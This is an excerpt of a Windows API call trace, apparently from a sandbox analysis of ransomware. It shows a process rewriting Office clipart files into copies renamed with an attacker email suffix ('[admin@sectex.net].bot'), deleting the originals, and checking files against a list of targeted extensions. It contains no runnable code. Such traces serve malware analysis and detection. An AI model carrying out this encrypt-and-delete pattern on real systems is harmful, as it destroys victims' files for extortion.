	[0149.537] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00557_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc
	[0149.537] GetLastError () returned 0x0
	[0149.537] ReadFile (in: hFile=0x3f8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x23d4, lpOverlapped=0x0) returned 1
	[0149.616] WriteFile (in: hFile=0x3fc, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x23e0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x23e0, lpOverlapped=0x0) returned 1
	[0149.617] ReadFile (in: hFile=0x3f8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.618] WriteFile (in: hFile=0x3fc, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.618] SetEndOfFile (hFile=0x3fc) returned 1
	[0149.618] CloseHandle (hObject=0x3fc) returned 1
	[0149.618] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.618] SetEndOfFile (hFile=0x3f8) returned 1
	[0149.620] CloseHandle (hObject=0x3f8) returned 1
	[0149.620] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.668] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00557_.wmf")) returned 1
	[0149.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63
	[0149.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63
	[0149.801] lstrlenW (lpString=".doc") returned 4
	[0149.801] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.801] lstrlenW (lpString=".docx") returned 5
	[0149.801] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.801] lstrlenW (lpString=".pdf") returned 4
	[0149.801] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.801] lstrlenW (lpString=".xls") returned 4
	[0149.801] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.801] lstrlenW (lpString=".xlsx") returned 5
	[0149.801] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.801] lstrlenW (lpString=".ppt") returned 4
	[0149.801] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63
	[0149.801] lstrlenW (lpString=".zip") returned 4
	[0149.801] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.801] lstrlenW (lpString=".rar") returned 4
	[0149.801] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.801] lstrlenW (lpString=".bz2") returned 4
	[0149.801] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.801] lstrlenW (lpString=".7z") returned 3
	[0149.801] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63
	[0149.801] lstrlenW (lpString=".dbf") returned 4
	[0149.801] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63
	[0149.801] lstrlenW (lpString=".1cd") returned 4
	[0149.801] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63
	[0149.801] lstrlenW (lpString=".jpg") returned 4
	[0149.801] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.802] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63
	[0149.802] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63
	[0149.802] lstrlenW (lpString=".doc") returned 4
	[0149.802] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.802] lstrlenW (lpString=".docx") returned 5
	[0149.802] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.802] lstrlenW (lpString=".pdf") returned 4
	[0149.802] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.802] lstrlenW (lpString=".xls") returned 4
	[0149.802] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.802] lstrlenW (lpString=".xlsx") returned 5
	[0149.802] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.802] lstrlenW (lpString=".ppt") returned 4
	[0149.802] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.802] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63
	[0149.802] lstrlenW (lpString=".zip") returned 4
	[0149.802] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.802] lstrlenW (lpString=".rar") returned 4
	[0149.802] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.802] lstrlenW (lpString=".bz2") returned 4
	[0149.802] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.802] lstrlenW (lpString=".7z") returned 3
	[0149.802] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.802] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63
	[0149.802] lstrlenW (lpString=".dbf") returned 4
	[0149.802] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.802] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63
	[0149.802] lstrlenW (lpString=".1cd") returned 4
	[0149.802] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.803] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63
	[0149.803] lstrlenW (lpString=".jpg") returned 4
	[0149.803] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.803] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.803] lstrlenW (lpString="J0086384.WMF") returned 12
	[0149.803] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086384.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0149.977] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=9734) returned 1
	[0149.977] CloseHandle (hObject=0x3b4) returned 1
	[0149.977] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086384.wmf")) returned 0x20
	[0149.982] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086384.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086384.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0149.982] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.982] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086384.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0149.983] GetLastError () returned 0x0
	[0149.983] ReadFile (in: hFile=0x3dc, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x2606, lpOverlapped=0x0) returned 1
	[0150.001] WriteFile (in: hFile=0x3f8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2610, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2610, lpOverlapped=0x0) returned 1
	[0150.002] ReadFile (in: hFile=0x3dc, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.004] WriteFile (in: hFile=0x3f8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.004] SetEndOfFile (hFile=0x3f8) returned 1
	[0150.004] CloseHandle (hObject=0x3f8) returned 1
	[0150.004] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.005] SetEndOfFile (hFile=0x3dc) returned 1
	[0150.007] CloseHandle (hObject=0x3dc) returned 1
	[0150.007] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.007] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086384.wmf")) returned 1
	[0150.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63
	[0150.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63
	[0150.008] lstrlenW (lpString=".doc") returned 4
	[0150.008] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.008] lstrlenW (lpString=".docx") returned 5
	[0150.008] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0150.008] lstrlenW (lpString=".pdf") returned 4
	[0150.008] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.008] lstrlenW (lpString=".xls") returned 4
	[0150.008] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.008] lstrlenW (lpString=".xlsx") returned 5
	[0150.008] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0150.008] lstrlenW (lpString=".ppt") returned 4
	[0150.008] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63
	[0150.008] lstrlenW (lpString=".zip") returned 4
	[0150.008] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.008] lstrlenW (lpString=".rar") returned 4
	[0150.008] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.008] lstrlenW (lpString=".bz2") returned 4
	[0150.008] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.008] lstrlenW (lpString=".7z") returned 3
	[0150.008] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63
	[0150.008] lstrlenW (lpString=".dbf") returned 4
	[0150.008] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63
	[0150.008] lstrlenW (lpString=".1cd") returned 4
	[0150.008] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63
	[0150.009] lstrlenW (lpString=".jpg") returned 4
	[0150.009] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63
	[0150.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63
	[0150.009] lstrlenW (lpString=".doc") returned 4
	[0150.009] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.009] lstrlenW (lpString=".docx") returned 5
	[0150.009] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0150.009] lstrlenW (lpString=".pdf") returned 4
	[0150.009] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.009] lstrlenW (lpString=".xls") returned 4
	[0150.009] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.009] lstrlenW (lpString=".xlsx") returned 5
	[0150.009] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0150.009] lstrlenW (lpString=".ppt") returned 4
	[0150.009] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63
	[0150.009] lstrlenW (lpString=".zip") returned 4
	[0150.009] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.009] lstrlenW (lpString=".rar") returned 4
	[0150.009] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.009] lstrlenW (lpString=".bz2") returned 4
	[0150.009] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.009] lstrlenW (lpString=".7z") returned 3
	[0150.009] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63
	[0150.009] lstrlenW (lpString=".dbf") returned 4
	[0150.009] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63
	[0150.009] lstrlenW (lpString=".1cd") returned 4
	[0150.010] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63
	[0150.010] lstrlenW (lpString=".jpg") returned 4
	[0150.010] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.010] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0150.010] lstrlenW (lpString="J0086426.WMF") returned 12
	[0150.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086426.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0150.010] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=21782) returned 1
	[0150.010] CloseHandle (hObject=0x3dc) returned 1
	[0150.010] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086426.wmf")) returned 0x20
	[0150.011] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086426.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.011] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086426.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0150.011] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.011] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.011] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086426.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0150.011] GetLastError () returned 0x0
	[0150.011] ReadFile (in: hFile=0x3dc, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x5516, lpOverlapped=0x0) returned 1
	[0150.099] WriteFile (in: hFile=0x3f8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x5520, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x5520, lpOverlapped=0x0) returned 1
	[0150.100] ReadFile (in: hFile=0x3dc, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.100] WriteFile (in: hFile=0x3f8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.100] SetEndOfFile (hFile=0x3f8) returned 1
	[0150.100] CloseHandle (hObject=0x3f8) returned 1
	[0150.100] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.101] SetEndOfFile (hFile=0x3dc) returned 1
	[0150.103] CloseHandle (hObject=0x3dc) returned 1
	[0150.103] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.137] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086426.wmf")) returned 1
	[0150.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF") returned 63
	[0150.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF") returned 63
	[0150.176] lstrlenW (lpString=".doc") returned 4
	[0150.176] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.176] lstrlenW (lpString=".docx") returned 5
	[0150.176] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0150.176] lstrlenW (lpString=".pdf") returned 4
	[0150.176] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.176] lstrlenW (lpString=".xls") returned 4
	[0150.176] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.176] lstrlenW (lpString=".xlsx") returned 5
	[0150.176] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0150.176] lstrlenW (lpString=".ppt") returned 4
	[0150.176] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF") returned 63
	[0150.176] lstrlenW (lpString=".zip") returned 4
	[0150.176] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.176] lstrlenW (lpString=".rar") returned 4
	[0150.176] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.176] lstrlenW (lpString=".bz2") returned 4
	[0150.176] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.176] lstrlenW (lpString=".7z") returned 3
	[0150.176] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF") returned 63
	[0150.176] lstrlenW (lpString=".dbf") returned 4
	[0150.177] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF") returned 63
	[0150.177] lstrlenW (lpString=".1cd") returned 4
	[0150.177] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF") returned 63
	[0150.177] lstrlenW (lpString=".jpg") returned 4
	[0150.177] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF") returned 63
	[0150.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF") returned 63
	[0150.177] lstrlenW (lpString=".doc") returned 4
	[0150.177] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.177] lstrlenW (lpString=".docx") returned 5
	[0150.177] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0150.177] lstrlenW (lpString=".pdf") returned 4
	[0150.177] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.177] lstrlenW (lpString=".xls") returned 4
	[0150.177] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.177] lstrlenW (lpString=".xlsx") returned 5
	[0150.177] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0150.177] lstrlenW (lpString=".ppt") returned 4
	[0150.177] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF") returned 63
	[0150.177] lstrlenW (lpString=".zip") returned 4
	[0150.177] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.177] lstrlenW (lpString=".rar") returned 4
	[0150.177] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.177] lstrlenW (lpString=".bz2") returned 4
	[0150.177] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.177] lstrlenW (lpString=".7z") returned 3
	[0150.177] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF") returned 63
	[0150.178] lstrlenW (lpString=".dbf") returned 4
	[0150.178] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF") returned 63
	[0150.178] lstrlenW (lpString=".1cd") returned 4
	[0150.178] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF") returned 63
	[0150.178] lstrlenW (lpString=".jpg") returned 4
	[0150.178] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.178] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0150.178] lstrlenW (lpString="J0090027.WMF") returned 12
	[0150.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090027.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0150.178] GetFileSizeEx (in: hFile=0x3ec, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=21268) returned 1
	[0150.179] CloseHandle (hObject=0x3ec) returned 1
	[0150.179] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090027.wmf")) returned 0x20
	[0150.179] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090027.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090027.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0150.179] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.179] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
